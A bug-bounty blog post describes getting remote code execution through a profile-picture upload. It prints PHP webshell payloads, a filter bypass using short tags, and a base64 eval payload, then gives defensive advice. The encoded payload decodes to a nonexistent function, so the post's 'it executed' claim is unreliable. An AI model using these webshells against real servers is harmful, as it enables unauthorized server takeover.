Introduction
In this post, I’m going to explain how I found a Remote Code Execution (RCE) vulnerability by simply uploading a profile. But, It has some filtering checks on the server-side, we need to understand how the server can react each request that contains a malicious characters. And It’s easier than it sounds, if you’re into bug hunting or penetration testing, this is something you’ll want to know!
What is RCE?
Remote Code Execution (RCE) is when an attacker can run any command they want on a server from a distance. Imagine being able to control a website’s server just by uploading a file — scary, right? That’s what RCE allows.
How File Uploads Can Be Dangerous
Many websites let users upload files like images or documents. But if the website isn’t careful with what files it accepts, an attacker could upload a file that does more than just store data — it could take over the server. That’s where RCE comes in.
How I Found the Vulnerability
Here’s a step-by-step breakdown of how I discovered RCE through file uploading:
1. Analyze the Hosting Server and It’s Programming Language
The first thing we need to analyze the hosting server, what type of server that the current application was hosted and running. There are 2 ways to identify this:
- Using Wappalyzer extension:
By observing the Response Headers:
Based on the above server “Apache” we confirm to try and escalate RCE.
2. Uploading php file on Profile feature
- In the profile upload feature, I initially tried uploading a
.phpfile, but there was a client-side restriction that only allowed image files like.jpgand.png. To bypass this, I uploaded an image and intercepted the request using BurpSuite. - Once I captured the request, I changed the file extension to
.phpand injected a simple PHP payload to execute commands via the GET method:
<?php system($_GET['cmd']); ?>
Although the server accepted the .php extension, it blocked the PHP payload due to some server-side filtering. I began experimenting by gradually removing special characters from the code and observing the server’s response. After some trials, I discovered that the server blocked files if the word “php” was detected. If it wasn’t present, the upload would succeed.
Blocked payload — <?php system($_GET[‘cmd’]); ?>
Accepted payload — <? system($_GET[‘cmd’]); ?>
Here, the payload was uploaded but this cannot be executable!!!!!
3. Crafting a Malicious Code
Next, I tried various PHP scripts, all of which were successfully uploaded, but none of them were executable. I didn’t give up! After thinking it over, I wondered, why not try sending the payload in an encoded format?
I decided to craft a PHP script using base64 encoding. The Final payload was:
<?=eval(base64_decode('ZWNobyBzaGVsbF91eGVjKCRfR0VUWydjbWQnXS4nIDI+JjEnKTs='));?>
I injected this payload, and it successfully executed. BOOM! RCE achieved!
Malicious code injection
Code Execution
Why Did This Work?
This vulnerability existed because:
- The server didn’t restrict file types — it allowed me to upload a dangerous file like
.php. - The file upload directory allowed execution of scripts, meaning my PHP file was able to run.
- The website didn’t properly check or sanitize the contents of uploaded files.
How to Protect Against This
Developers can prevent RCE vulnerabilities by:
- Restricting allowed file types: Only allow safe file types like
.jpg,.png, or.pdf. - Validating file contents: Check that the file is what it says it is. Don’t just rely on the extension.
- Storing files securely: Store uploaded files in a folder where they can’t be executed, even if they contain malicious code.
Conclusion
Finding RCE via file uploads isn’t hard if you know what to look for. It’s about testing how the server handles files and checking if you can upload something dangerous. If you’re a beginner, try playing around with file upload forms, and you might find similar issues.
Hope you enjoyed this post! If you’re into bug bounties or security research, this method could help you discover some serious vulnerabilities. Stay safe, and happy hacking!
Let’s Keep in Touch
- Twitter: https://x.com/akashoffsec
- LinkedIn: https://www.linkedin.com/in/akash-a-687abb250/
- GitHub: https://github.com/akashoffsec